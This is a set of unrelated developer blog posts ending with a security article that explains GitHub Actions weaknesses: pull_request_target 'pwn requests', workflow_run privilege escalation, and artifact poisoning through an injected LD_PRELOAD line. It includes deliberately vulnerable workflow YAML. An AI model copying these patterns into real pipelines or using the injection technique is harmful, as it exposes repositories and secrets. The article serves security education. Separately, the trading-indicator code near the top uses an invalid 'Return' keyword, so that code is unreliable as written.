algorithm address: https://www.fmz.com/strategy/154050
- Source code
```
// indicator function
function AdX(MDI, PDI, adx_period) {
if(typeof(MDI) == "undefined" || typeof(PDI) == "undefined"){
Return false
}
if(MDI.length < 10 || PDI.length < 10){
Return false
}
/*
dX = abs(DIPlus-DIMinus) / (DIPlus+DIMinus)*100
AdX = sma(dX, len)
*/
var dx = []
for(var i = 0; i < MDI.length; i++){
if(!MDI[i] || !PDI[i]){
continue
}
var dxValue = Math.abs((PDI[i] - MDI[i])) / (PDI[i] + MDI[i]) * 100
var obj = {
close : dxValue,
}
dx.push(obj)
}
if(dx.length < adx_period){
Return false
}
var adx = talib.SMA(dx, adx_period)
Return adx
}
function DMI(records, pdi_period, mdi_period, adxr_period, adx_period) {
var recordsHLC = []
for(var i = 0; i < records.length ; i++){
var bar = {
High : records[i].High,
Low : records[i].Low,
close : records[i].close,
}
recordsHLC.push(bar)
}
var m_di = talib.MINUS_DI(recordsHLC, mdi_period)
var p_di = talib.PLUS_DI(recordsHLC, pdi_period)
var adx = AdX(m_di, p_di, adx_period)
// adXR=(AdX of the day before the AdX+ AX)÷2
var n = 0
var adxr = []
for (var j = 0 ; j < adx.length; j++) {
if (typeof(adx[j]) == "number") {
n++
}
if (n >= adxr_period) {
var curradxr = (adx[j] + adx[j - adxr_period]) / 2
adxr.push(curradxr)
} else {
adxr.push(NaN)
}
}
Return [m_di, p_di, adx, adxr]
}
```
- Comparing
Using the data library of FMZ Quant, it is easy to draw a chart and compare DMI with other charts.


Comparing the indicator values on several k-line bars, the values are basically the same (slightly rounded deviation).
- Usage
Directly use the DMI function (such as the way called in the main function in the example), pass in the K line data, set the indicator parameters, which are generally 14.
The data returned by the function is a two-dimensional array representing four lines.
DI- : m_di
DI+ : p_di
AdX : adx
adXR: adxr
Among these four lines of DMI indicator, DI- and DI+ are long and short indicators, reflecting the strength of both long and short position.
AdX and adXR are a pair of indicator lines used together, which are trend indicators, reflecting the current trend and direction of the market.
DI+, the higher the indicator value, the stronger the current bull market, otherwise the weaker the bull market.
DI-, the opposite of above.
DI+, DI- are often intertwined, and the closer the value is between, the market is in a deadlock. Conversely, the trend is enhanced.
## Signal
- Price bottom signal
After a long-term price decline, if the following conditions are met in the short term, it indicates that the short-term price bottom has been reached, and there may be a rebound or reversal.
**The DI+ line which representing the long-buying strength is below 10, and the line is turned upwards in the oversold position, and the DI-line is at the high position.**
**The AdX line which representing the trend is at a higher position above 65, turning down and forming a down-cross with the adXR line.**
- Price top signal
After a long-term rise, if the following conditions are met in the short term, the short-term high price has been reached and there may be short-term adjustments or reversals.
**The DI-line which representing the short-selling strength is below 10, and the line is turned upwards at the low position, and the DI+ line is at a high position.**
**The AdX line which representing the trend is at a higher position above 65, turning down and forming a down-cross with the adXR line.**
- Rising of the trend
After a period of fluctuations in the price movement, DMI's four indicator lines are intertwined at the low price, and then suddenly there is a long positive k-line with large volume increasing the price over 5%. DI+ line continuously cross the DI- line, AdX line and adXR line within two days, indicating that a new uptrend will be formed. You can open position when the DI+ line up cross the last indicator line.
From: https://blog.mathquant.com/2019/08/03/calculation-and-application-of-dmi-indicators.html | fmzquant |
1,879,782 | Rumo do dev.to e aprendizado. | Hey people, acho que pouca gente, ou ninguém, acompanha esse dev.to mas ele vai virar um repositório... | 0 | 2024-06-07T02:17:27 | https://dev.to/matheuscsnt/rumo-do-devto-e-aprendizado-50m1 | productivity | Hey _people_, acho que pouca gente, _ou ninguém_, acompanha esse dev.to mas ele vai virar um **repositório de aprendizado**. Recentemente vi um post no X onde as pessoas falavam sobre o que sentiam falta da faculdade presencial, e além da socialização que pra mim é essencial e vital, percebi que senti falta de algo que me ajudava bastante a fixar conteúdos, que são os **trabalhos para casa, apresentações e seminários**.
Com isso decidi que vou pegar assuntos chaves das minhas matérias da faculdade e passar trabalhos para mim mesmo e postar aqui, afim de fixar o conhecimento e também organizar conceitos e anotações. Então, é isso que vocês verão por aqui em breve, muito conteúdo, pela minha visão.
| matheuscsnt |
893,543 | Help needed with pipenv problem | I am new to using pipenv virtual environments. I am using one with a Django project. Recently I... | 0 | 2021-11-10T00:39:09 | https://dev.to/macumhail/help-needed-with-pipenv-problem-e11 | beginners, pipenv | I am new to using pipenv virtual environments. I am using one with a Django project. Recently I accidentally executed a sudo command while inside pipenv shell. When I later tried to start the environment with "pipenv shell." I got a message that said, "The folder you are executing pip from can no longer be found."
I exited the directory and re-entered. Then ran pipenv shell again. This time the env was activated. However when I try to install a package or run pipenv lock --clear I get the following error:
Locking [dev-packages] dependencies...
Locking [packages] dependencies...
Building requirements...
Resolving dependencies...
✘ Locking Failed!
Traceback (most recent call last):
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/resolver.py", line 764, in <module>
main()
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/resolver.py", line 758, in main
_main(parsed.pre, parsed.clear, parsed.verbose, parsed.system, parsed.write,
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/resolver.py", line 741, in _main
resolve_packages(pre, clear, verbose, system, write, requirements_dir, packages, dev)
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/resolver.py", line 695, in resolve_packages
from pipenv.core import project
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/core.py", line 33, in <module>
from .project import Project
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/project.py", line 30, in <module>
from .vendor.requirementslib.models.utils import get_default_pyproject_backend
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/requirementslib/__init__.py", line 9, in <module>
from .models.lockfile import Lockfile
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/requirementslib/models/lockfile.py", line 14, in <module>
from ..utils import is_editable, is_vcs, merge_items
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/requirementslib/utils.py", line 8, in <module>
import pip_shims.shims
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/__init__.py", line 26, in <module>
from . import shims
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/shims.py", line 12, in <module>
from .models import (
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 790, in <module>
Command.add_mixin(SessionCommandMixin)
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 704, in add_mixin
mixin = mixin.shim()
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 752, in shim
result = self.traverse(top_path)
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 744, in traverse
result = shim.shim()
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 590, in shim
imported = self._import()
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 615, in _import
result = self._import_module(self.calculated_module_path)
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 365, in _import_module
imported = importlib.import_module(module)
File "/Users/mainuser/.pyenv/versions/3.9.2/lib/python3.9/importlib/__init__.py", line 127, in import_module
return _bootstrap._gcd_import(name[level:], package, level)
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/patched/notpip/_internal/cli/req_command.py", line 15, in <module>
from pipenv.patched.notpip._internal.index.package_finder import PackageFinder
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/patched/notpip/_internal/index/package_finder.py", line 21, in <module>
from pipenv.patched.notpip._internal.index.collector import parse_links
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/patched/notpip/_internal/index/collector.py", line 12, in <module>
from pipenv.patched.notpip._vendor import html5lib, requests
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/patched/notpip/_vendor/requests/__init__.py", line 97, in <module>
from pipenv.patched.notpip._vendor.urllib3.contrib import pyopenssl
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/patched/notpip/_vendor/urllib3/contrib/pyopenssl.py", line 46, in <module>
import OpenSSL.SSL
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/OpenSSL/__init__.py", line 8, in <module>
from OpenSSL import rand, crypto, SSL
File "/Users/mainuser/anaconda/lib/python3.6/site-packages/OpenSSL/rand.py", line 213, in <module>
_lib.ERR_load_RAND_strings()
AttributeError: module 'lib' has no attribute 'ERR_load_RAND_strings'
The environment is supposed to use python 3.9 but from the information above it appears to be using 3.6. Any ideas about how to fix this.
| macumhail |
1,879,781 | React.js 2024 Patterns | Hey) Here is a repo that explains most of the React.js... | 0 | 2024-06-07T02:15:24 | https://dev.to/leon740/reactjs-2024-patterns-4an5 | Hey)
Here is a repo that explains most of the React.js patterns.
https://github.com/Leon740/DreamReactStudy/tree/main/src/1_React
It's done using examples and chronological order.

| leon740 | |
1,879,780 | Elevate Your Next.js E-commerce App with Google Tag Manager | Google Tag Manager simplifies the process of adding and updating tags (snippets of code) on your... | 0 | 2024-06-07T02:12:18 | https://dev.to/abdur_rakibrony_97cea0e9/elevate-your-nextjs-e-commerce-app-with-google-tag-manager-1ke0 | react, nextjs, gtm | Google Tag Manager simplifies the process of adding and updating tags (snippets of code) on your website without modifying the source code. It's a game-changer for marketers and analysts who need agility in tracking various events.
## Integrating GTM with Next.js:
Next.js, a React framework, has gained popularity for its simplicity and performance optimizations. Let's see how we can seamlessly integrate GTM:
```
import { GoogleTagManager } from '@next/third-parties/google'
import { Suspense } from "react";
// In your layout component
<Suspense fallback={null}>
<GoogleTagManager gtmId="GTM-******" />
</Suspense>
```
Here, we're using @next/third-parties/google, an official package that simplifies third-party script integration in Next.js. The GoogleTagManager component takes your GTM container ID (gtmId). We wrap it in a Suspense component with a null fallback to avoid any layout shifts during loading.
## Tracking Product Views:
```
"use client";
import { useEffect } from "react";
// In your product detail component
useEffect(() => {
if (product) {
window.dataLayer = window.dataLayer || [];
window.dataLayer.push({ ecommerce: null });
window.dataLayer.push({
event: "view_item",
ecommerce: {
currency: "BDT",
value: product?.price,
items: [
{
item_id: product?._id,
item_name: product?.title,
item_category: product?.category,
item_variant: product?.category || "",
price: product?.price,
quantity: product?.quantity,
},
],
},
});
}
}, [product]);
```
## Breaking down the code:
**"use client:"** This is a Next.js directive indicating that the following code should run on the client-side.
**useEffect:** A React hook that runs after the component renders. Here, it runs when the product changes.
**window.dataLayer:** This is how GTM receives data. We initialize it if it doesn't exist.
**dataLayer.push({ ecommerce: null }):** This clears any previous ecommerce data to avoid conflicts.
**dataLayer.push({ ... }):** We push the view_item event data.
**event:** "view_item" is a standard GA4 ecommerce event.
**ecommerce.currency:** The currency code (BDT for Bangladeshi Taka).
**ecommerce.value:** The discounted price of the product.
**ecommerce.items:** An array of items viewed. In this case, just one product. item_id, item_name, item_category, item_variant, price, and quantity are standard GA4 product properties. | abdur_rakibrony_97cea0e9 |
1,879,779 | Display the current time | Goal: 01 / 01 / 2000, 12:00 const now = new Date(); const day = `${now.getDate()}`.padStart(2,... | 0 | 2024-06-07T02:08:40 | https://dev.to/kakimaru/display-the-current-time-4607 | Goal: 01 / 01 / 2000, 12:00
```
const now = new Date();
const day = `${now.getDate()}`.padStart(2, '0');
const month = `${now.getMonth() + 1}`.padStart(2, '0');
const year = now.getFullYear();
const hour = now.getHours();
const min = now.getMinutes();
```
- padStart() needs to be used with a string.
- padStart() fills the first argument's number of minutes with the elements of the second argument.
```
hoge.textContent = `${day}/${month}/${year}, ${hour}:${min}`;
```
-----
If I want to show 'TODAY' or 'Yesterday' when the day is matched.
```
const calcDayPassed = (date1, date2) => Math.round(Math.abs(date2 - date1) / (1000 * 60 * 60 * 24)); // get time stamp
const daysPassed = calcDayPassed(new Date(), date)
if(daysPassed === 0) return 'Today';
if(daysPassed === 1) return 'Yesterday';
if(daysPassed <= 7) return `${daysPassed} days ago`;
else {
const day = `${date.getDate()}`.padStart(2, '0');
const month = `${date.getMonth() + 1}`.padStart(2, '0');
const year = date.getFullYear();
return `${day}/${month}/${year}`;
}
```
Globalisation
```
const now = new Date();
const options = {
hour: 'numeric',
minute: 'numeric',
day: 'numeric',
month: 'numeric',
year: `numeric`,
}
const locale = navigator.language;
hoge.textContent = new Intl.DateTimeFormat(currentAccount.locale, options).format(now);
```
[MDN : Int](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Intl/DateTimeFormat)
| kakimaru | |
1,879,774 | Generative AI Serverless - RAG using Bedrock Knowledge base, Zero Setup, Single document, Lambda and API! | Generative AI - Has Generative AI captured your imagination to the extent it has for me? Generative... | 0 | 2024-06-07T02:07:47 | https://dev.to/bhatiagirish/generative-ai-serverless-rag-using-bedrock-knowledge-base-zero-setup-single-document-lambda-and-api-3djn | aws, anthropic, bedrock, generativeai | Generative AI - Has Generative AI captured your imagination to the extent it has for me?
Generative AI is indeed fascinating! The advancements in foundation models have opened up incredible possibilities. Who would have imagined that technology would evolve to the point where you can generate content summaries from transcripts, have chatbots that can answer questions on any subject without requiring any coding on your part, or even create custom images based solely on your imagination by simply providing a prompt to a Generative AI service and foundation model? It's truly remarkable to witness the power and potential of Generative AI unfold.
**'Chat with your document' is the latest Generative AI feature added by Amazon to its already feature-rich areas of GenAI, Knowledge Base, and RAG.**
RAG, which stands for Retrieval Augmented Generation, is becoming increasingly popular in the world of Generative AI. It allows organizations to overcome the limitations of LLMs and utilize contextual data for their Generative AI solutions.
Amazon Bedrock is a fully managed service that offers a choice of many foundation models, such as Anthropic Claude, AI21 Jurassic-2, Stability AI, Amazon Titan, and others.
I will use the recently released Anthropic Sonnet foundation model and invoke it via the Amazon Console Bedrock Knowledge Base & subsequently via a Lambda function via API.
As of May 2024, this is the only model supported by AWS for the single document knowledge base or 'Chat with your document' function.
There are many use cases where generative AI chat with your document function can help increase productivity. Few examples will be technical support extracting info from user manual for quick resolution of questions from the customers, or HR answering questions based on policy documents or developer using technical documentation to get info about specific function or a call center team addressing inquiries from customers quickly by chatting with product documentation.
**Let's look at our use cases:**
• MyBankGB, a fictitious bank, offers various credit cards to consumers. The document "MyBankGB Credit Card Offerings.pdf" contains detailed information about all the features and details of the credit cards offered by the bank.
• MyBankGB is interested in implementing a Generative AI solution using the "Chat with your document" function of Amazon Bedrock Knowledge Base. This solution will enable the call center team to quickly access information about the card features and efficiently address customer inquiries.
• The solution needs to be API-based so that it can be invoked via different applications.
Here is the architecture diagram for our use case.

Let's see the steps to create a single document knowledge base in Bedrock and start consuming it using AWS Console and then subsequently creating a lambda function to invoke it via API.
**Review AWS Bedrock 'Chat with your document**
Chat with document is a new feature. You can use it via AWS Console or can use SDK to invoke it via Bedrock, Lambda and API.

For Data, you can upload a file from your computer OR you can provide ARN for the file posted in the S3 bucket.

Select model. Anthropic Claude 3 Sonnet is the only supported model as of May, 2024.
**Request Model Access**
Before you can use the model, you must request access to the model.
Chat with your document using AWS Console

**Review the response**

**Let's review more prompts and responses!**


As you can see above, all answers are provided in the context of the document uploaded in the S3 bucket. This is where RAG makes the generative AI responses more accurate and reliable, and controls the hallucination.
However, our business use case asks for creating an API based solution hence we will extend this solution by implementing a Lambda function and API that can be invoked by the user or application.
**Create a SAM template**
I will create a SAM template for the lambda function that will contain the code to invoke Bedrock API along with required parameters and a prompt for the RAG. Lambda function can be created without the SAM template however, I prefer to use Infra as Code approach since that allow for easy recreation of cloud resources. Here is the SAM template for the lambda function.

**Create a Lambda Function**
The Lambda function serves as the core of this automated solution. It contains the code necessary to fulfill the business requirement of creating an API for RAG based generative AI solution. This Lambda function accepts a prompt, which is then forwarded to the Bedrock API to generate a response using the single document knowledge base and Anthropic Sonnet foundation model. Now, Let’s look at the code behind it.

**Build function locally using AWS SAM**
Next build and validate function using AWS SAM before deploying the lambda function in AWS cloud. Few SAM commands used are:
• SAM Build
• SAM local invoke
• SAM deploy
**Validate the GenAI Model response using a prompt**
Prompt engineering is an essential component of any Generative AI solution. It is both art and science, as crafting an effective prompt is crucial for obtaining the desired response from the foundation model. Often, it requires multiple attempts and adjustments to the prompt to achieve the desired outcome from the Generative AI model.
Given that I'm deploying the solution to AWS API Gateway, I'll have an API endpoint post-deployment. I plan to utilize Postman for passing the prompt in the request and reviewing the response. Additionally, I can opt to post the response to an AWS S3 bucket for later review.


Based on the prompt, requested info is returned, Source/citation is also provided in the response.
With these steps, a serverless GenAI solution has been successfully completed to implement a single-document knowledge base using Amazon Bedrock, Lambda, and API. Python/Boto3 were utilized to invoke the Bedrock API with Anthropic Sonnet.
As GenAI solutions keep improving, they will change how we work and bring real benefits to many industries. This workshop shows how powerful AI can be in solving real-world problems and creating new opportunities for innovation.
Thanks for reading!
Click here to get to YouTube video for this solution.
{% embed https://www.youtube.com/watch?v=B_G_JTdcqiY %}
https://www.youtube.com/watch?v=B_G_JTdcqiY
𝒢𝒾𝓇𝒾𝓈𝒽 ℬ𝒽𝒶𝓉𝒾𝒶
𝘈𝘞𝘚 𝘊𝘦𝘳𝘵𝘪𝘧𝘪𝘦𝘥 𝘚𝘰𝘭𝘶𝘵𝘪𝘰𝘯 𝘈𝘳𝘤𝘩𝘪𝘵𝘦𝘤𝘵 & 𝘋𝘦𝘷𝘦𝘭𝘰𝘱𝘦𝘳 𝘈𝘴𝘴𝘰𝘤𝘪𝘢𝘵𝘦
𝘊𝘭𝘰𝘶𝘥 𝘛𝘦𝘤𝘩𝘯𝘰𝘭𝘰𝘨𝘺 𝘌𝘯𝘵𝘩𝘶𝘴𝘪𝘢𝘴𝘵
| bhatiagirish |
1,879,778 | 2024 vs. 2050: A Hilarious Look at Our Technological Future | Welcome, fellow tech enthusiasts, to a blog post that’s part crystal ball and part comedy club!... | 0 | 2024-06-07T02:05:34 | https://dev.to/nandha_krishnan_nk/2024-vs-2050-a-hilarious-look-at-our-technological-future-3dbk | ai, computerscience, career | Welcome, fellow tech enthusiasts, to a blog post that’s part crystal ball and part comedy club! Today, we’re taking a lighthearted yet informative journey to compare the year 2024 with the far-off and fantastical 2050. Buckle up, because we’re about to zoom through time with a mix of wit, wonder, and a dash of whimsy.

**The Year 2024: Where Are We Now?**
Ah, 2024. A year where the future feels tantalizingly close, yet we’re still waiting for some of those sci-fi dreams to become reality. Let’s start by taking a look at the technological landscape of today.
**Highlights of 2024:**
**5G Networks:** We're enjoying super-fast internet speeds, but still complaining when a cat video buffers for half a second.
**AI Assistants:**Siri and Alexa are practically family members, yet they still struggle to understand our thick morning accents.
**Electric Vehicles:** Tesla's are everywhere, silently judging us for driving anything with an internal combustion engine.
**Smart Homes:** Our fridges can tell us when we're out of milk, but they still can’t stop us from eating that leftover pizza at 2 AM.
**Social Media:** We're all connected, oversharing our lives, and deep-diving into conspiracy theories at 3 AM.
Life in 2024 is pretty great, but what does the future hold? Let's leap forward to 2050 and see how things might change—and laugh a bit along the way.

**The Year 2050:** A Peek into the Future
Welcome to 2050, a world where today’s sci-fi is tomorrow’s reality. Here’s a glimpse of the incredible (and sometimes ridiculous) advancements we might see.
**Highlights of 2050:**
**Holographic Meetings:** Forget Zoom fatigue. In 2050, we’re dealing with hologram headaches because your boss's hologram insists on pacing around your living room during meetings.
**AI Companions:** AI assistants are now fully sentient and capable of emotional support. Be prepared for your toaster to give you life advice and your vacuum to ask for a raise.
**Flying Cars:** They’re finally here! And they come with their own set of problems, like aerial traffic jams and bird-strike insurance.
**Space Tourism:** Everyone’s going to Mars for vacation, but there’s still no Wi-Fi in space. Guess you’ll have to upload your zero-gravity selfies when you get back.
**Smart Everything:** Your entire wardrobe is smart. Clothes that change color, adjust temperature, and even give you a pep talk before a big date. Just don’t ask them for fashion advice—they can be brutally honest.
**Comparing 2024 and 2050**
Now, let’s take a side-by-side look at how far we’ve come (and laugh a bit at the absurdity of it all).
**Communication:**
**2024:** “Hey Siri, call Mom.”
**2050:** “Hey Holo-Siri, project Mom’s hologram here so I can show her my new Martian pet.”
**Transportation:**
**2024:** Electric cars are cool, but we’re still stuck in traffic.
**2050:** Flying cars are cooler, but we’re now stuck in aerial traffic, dodging drones and the occasional lost weather balloon.
**Entertainment:**
**2024:** Binge-watching on Netflix.
**2050:** Immersing ourselves in full-sensory VR shows where you not only watch but also smell, taste, and feel the action. Just hope the horror movies come with a “smell off” option.

**Daily Life:**
**2024:** Smart homes that sometimes misunderstand our commands. “Alexa, turn off the lights!”—“Playing ‘Turning Off the Lights’ by John Doe.”
**2050:** Ultra-smart homes that anticipate our needs. “I’ve ordered dinner, set the mood lighting, and started your favorite playlist. Also, your ex is approaching the door, should I deploy the escape hatch?”
**Conclusion**
While 2024 is a marvel of modern technology, 2050 promises a future where today’s dreams and frustrations become tomorrow’s realities and comedy sketches. From AI companions with attitude to flying cars causing aerial pile-ups, the future is bound to be as entertaining as it is advanced.
Stay tuned to our blog for more futuristic fun and tech insights. Don’t forget to subscribe and follow us—whether you’re still on your 2024 smartphone or your 2050 mind-implanted AI assistant does it for you! | nandha_krishnan_nk |
1,879,776 | Call for action: Exploring vulnerabilities in Github Actions | In this blog post, we will provide an overview of GitHub Actions, examine various vulnerable scenarios with real-world examples, offer clear guidance on securely using error-prone features, and introduce an open source tool designed to scan configuration files and flag potential issues. | 0 | 2024-06-07T02:00:44 | https://snyk.io/blog/exploring-vulnerabilities-github-actions/ | devsecops, javascript, docker, node | To address the need for streamlined code changes and rapid feature delivery, CI/CD solutions have become essential. Among these solutions, GitHub Actions, launched in 2018, has quickly garnered significant attention from the security community. Notable findings have been published by companies like Cycode and Praetorian and security researchers such as Teddy Katz and Adnan Khan. Our recent investigation reveals that vulnerable workflows continue to emerge in prominent repositories from organizations like Microsoft (including Azure), HashiCorp, and more. In this blog post, we will provide an overview of GitHub Actions, examine various vulnerable scenarios with real-world examples, offer clear guidance on securely using error-prone features, and introduce an open source tool designed to scan configuration files and flag potential issues.
Github Actions overview
-----------------------
GitHub Actions is a powerful CI/CD solution that enables the automation of workflows in response to specific triggers. Each workflow consists of a set of jobs executed on either GitHub-hosted or self-hosted runner virtual machines. These jobs are composed of steps, where each step can execute a script or an Action — a reusable unit hosted on the GitHub Actions Marketplace or any GitHub repository.
Actions come in three forms:
1. **Docker**: Executes a Docker image hosted on Docker Hub inside a container.
2. **JavaScript**: Runs a Node.js application directly on the host machine.
3. **Composite**: Combines multiple steps into a single action.
Workflows are defined using YAML files located in a repository’s `.github/workflows` directory. Here is a basic example:
```
name: Base Workflow
on:
pull_request:
jobs:
whoami:
name: I'm base
runs-on: ubuntu-latest
steps:
- run: echo "I'm base"
```
Each workflow should include a `name` directive for reference, an `on` clause to specify triggers (such as the creation, modification, or closure of a pull request), and a `jobs` section that defines the jobs to be executed. Jobs run concurrently unless otherwise specified through conditional `if` statements.
Refer to the [official documentation](https://docs.github.com/en/actions) for more detailed information on GitHub Actions and how to create them.
### Authentication and secrets in GitHub Actions
GitHub Actions automatically generates a `GITHUB_TOKEN` secret at the start of each workflow. This token is used to authenticate the workflow and manage its permissions. The token’s permissions can be applied globally across all jobs in a workflow or configured separately for each job. The `GITHUB_TOKEN` is crucial as it allows users to modify repository contents directly or interact with the GitHub API to perform privileged actions.
Additionally, GitHub Actions supports passing secrets to a job. Secrets are sensitive values defined in the project settings used for operations like authenticating to third-party services or accessing external APIs. If an attacker gains access to a secret, they could potentially extend the impact of an attack beyond GitHub Actions. Here's an example of a job using a secret:
```
name: Base Workflow
on:
pull_request:
jobs:
use-secret:
name: I'm using a secret
env:
MY_SECRET: ${{ secrets.MY_SECRET }}
runs-on: ubuntu-latest
steps:
- run: command --secret “$MY_SECRET”
```
As we’ve covered the basics, let’s dig deeper and see cases where misconfigured or outright vulnerable workflows can have security implications.
Vulnerable scenarios
--------------------
One particularly problematic feature in GitHub Actions is the handling of forked repositories. Forking allows developers to add features to repositories for which they lack write permissions by creating a copy of the repository, complete with its entire history, under the user's namespace. Developers can then work on this forked repository, create branches, push code changes, and eventually open a pull request back to the upstream repository (also known as the "base"). After an upstream maintainer reviews and approves the pull request (PR), the changes can be merged into the base repository.
In the context of a forked repository (referred to as "the context of the merge commit" in GitHub documentation), the user has complete control, and there are no restrictions on who can fork a repository. This creates a security boundary that GitHub is aware of. For example, the `pull_request` event is recommended for PRs originating from forks, as it doesn't have access to the base repository's context and secrets.
Conversely, the `pull_request_target` event has full access to the base repository’s context and secrets and often includes read/write permissions to the repository. Suppose this event does not validate inputs such as branch names, PR bodies, and artifacts originating from the fork. In that case, it can compromise the security boundary, potentially leading to hazardous effects on the workflow.
To help settle the confusion between the `pull_request_target` and `pull_request` triggers, here’s a table with the key differences:
| | `**pull\_request**` | `**pull\_request\_target**` |
| --- | --- | --- |
| Context of execution | forked repo | base repo |
| Secrets | ⛔ | ✅ |
| Default `GITHUB_TOKEN` permissions | READ | READ/WRITE |
### Pwn request
A "Pwn Request" scenario occurs when a workflow mishandles the `pull_request_target` trigger, potentially compromising the `GITHUB_TOKEN` and leaking secrets. Three specific conditions must be met for this issue to be exploitable:
**Workflow triggered by** `**pull\_request\_target**` **event**: The `pull_request_target` event runs in the context of the base of the pull request, not in the context of the merge commit, as the `pull_request` event does. This means that the workflow will execute the code in the context of the upstream repository, which a user of the forked repository should not have access to. Consequently, the `GITHUB_TOKEN` is typically granted write permissions. The `pull_request_target` event is intended to be used with safe upstream code, hence an additional condition is needed to break this boundary.
**Explicit checkout from the forked repository**:
```
- uses: actions/checkout@v2
with:
ref: ${{ github.event.pull_request.head.sha }}
```
Note: `github.event.pull_request.head.ref` is also a dangerous option. The ref clause points to the forked repository, and checking it out means the job will run code fully controlled by an attacker.
**Code execution or injection point**: This is where the damage occurs. Suppose an attacker has complete control over the checked-out code. In that case, they can replace any script that gets executed in subsequent steps with a malicious version, modify a configuration file with command execution potential (e.g., `package.json` used by `npm install`), or exploit a command injection vulnerability within a step to execute arbitrary code. The extent of the damage depends on how the permissions are configured and whether there are any secrets that can be leaked to compromise additional services. Since the `GITHUB_TOKEN`'s lifecycle is limited to the currently running workflow, an attacker must craft the exploit to run within that window.
For a deep dive into how secrets can be leaked from GitHub Actions, refer to [Karim Rahal](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/)’s excellent write-up.
### workflow\_run privilege escalation
The `workflow_run` trigger in GitHub Actions is designed to run workflows sequentially rather than concurrently — starting one workflow after completing another. However, the subsequent workflow is executed with write permissions and access to secrets, even if the triggering workflow does not have such privileges. This creates a potential security risk similar to those previously discussed. How can an attacker exploit these elevated privileges?
**Control over the triggering workflow**: The triggering workflow must be completed successfully and controlled by the attacker. For instance, this workflow can be triggered by the `pull_request` event, which runs in the context of the merge (or forked) repository and is intended to run unsafe code.
**Workflow triggered with** `**workflow\_run**`: A subsequent workflow must be triggered by the `workflow_run` event and explicitly check out the unsafe code from the forked repository:
```
- uses: actions/checkout@v4
with:
repository: ${{ github.event.workflow_run.head_repository.full_name }}
ref: ${{ github.event.workflow_run.head_sha }}
fetch-depth: 0
```
Notice the `repository` and `ref` input variables pointing to the attacker-controlled code. This code is now granted elevated privileges for the `workflow_run` event, leading to privilege escalation.
**Code execution or injection point**: Similar to previous scenarios, an attacker needs a code execution or injection point in order to take over the triggered workflow.
### Unsafe artifact download
As we’ve seen in the case of `pull_request_target` and `workflow_run`, running workflows with read-write privileges to an upstream repo on untrusted code can be hazardous. According to official Github docs, it’s recommended to split the workflow into two: one that does unsafe operations, such as running build commands on a low-privileged workflow, and one that consumes the output artifacts and performs privileged operations, such as commenting on the PR. By itself, this is perfectly safe, but what happens if the privileged workflow uses the artifact unsafely?
Let’s take a look at the following example.
upload.yml:
```
name: Upload
on:
pull_request:
jobs:
test-and-upload:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
- name: Run tests
Run: npm install
- name: Store PR information
if: ${{ github.event_name == 'pull_request' }}
run: |
echo ${{ github.event.number }} > ./pr.txt
- name: Upload PR information
if: ${{ github.event_name == 'pull_request' }}
uses: actions/upload-artifact@v4
with:
name: pr
path: pr.txt
```
download.yml:
```
jobs:
download:
runs-on: ubuntu-latest
if:
github.event.workflow_run.event == 'pull_request' &&
github.event.workflow_run.conclusion == 'success'
steps:
- uses: actions/download-artifact@v4
with:
name: pr
path: ./pr.txt
- name: Echo PR num
run: |
PR=$(cat ./pr.txt)
echo "PR_NO=${PR}" >> $GITHUB_ENV
```
An attacker can create a PR that replaces `package.json` with a crafted one to execute arbitrary code in the `npm install` step and trigger the upload workflow. They can add a `preinstall` script that sets `LD_PRELOAD` to replace the `pr.txt` file with a malicious one like `1\nLD_PRELOAD=[ATTACKER_SHARED_OBJ]`. When this file is read in the download workflow, the `LD_PRELOAD` payload will be injected into `GITHUB_ENV` in the echo command. If an attacker can also download a shared object, e.g., by downloading a second artifact they control, the entire privileged workflow can be compromised.
### Self-hosted runners
Github Actions provides hosted ephemeral runners to execute workflows. If a user wishes, they can set up a self-hosted runner over which they have full control. This doesn’t come without a price — if it gets compromised, an attacker can persist on the runner and infiltrate other workflows running on the same host and other hosts on the internal network. When these runners are configured in public repos, they increase the attack surface as they can execute code that doesn’t only originate from the repo maintainers and trusted developers. A detailed exploration of this vector can be found in [Adnan Khan’s blog](https://adnanthekhan.com/2023/12/20/one-supply-chain-attack-to-rule-them-all/comment-page-1/).
### Vulnerable actions
Actions are also a viable attack vector to compromise a workflow. Since Actions are hosted on Github, taking over one can trigger a supply-chain attack on all the workflows that depend on it. But one does not have to go that far — actions are just scripts often running directly on the runner host (and sometimes inside Docker containers). They receive data from the calling job through `inputs` and can access the global Github context and secrets. Essentially, whatever a calling workflow can do, a callee Action can also do it. If an Action contains a “classical” vulnerability, such as a command injection and an attacker that can trigger it with some input they control, they can take over the entire workflow.
Exploit techniques
------------------
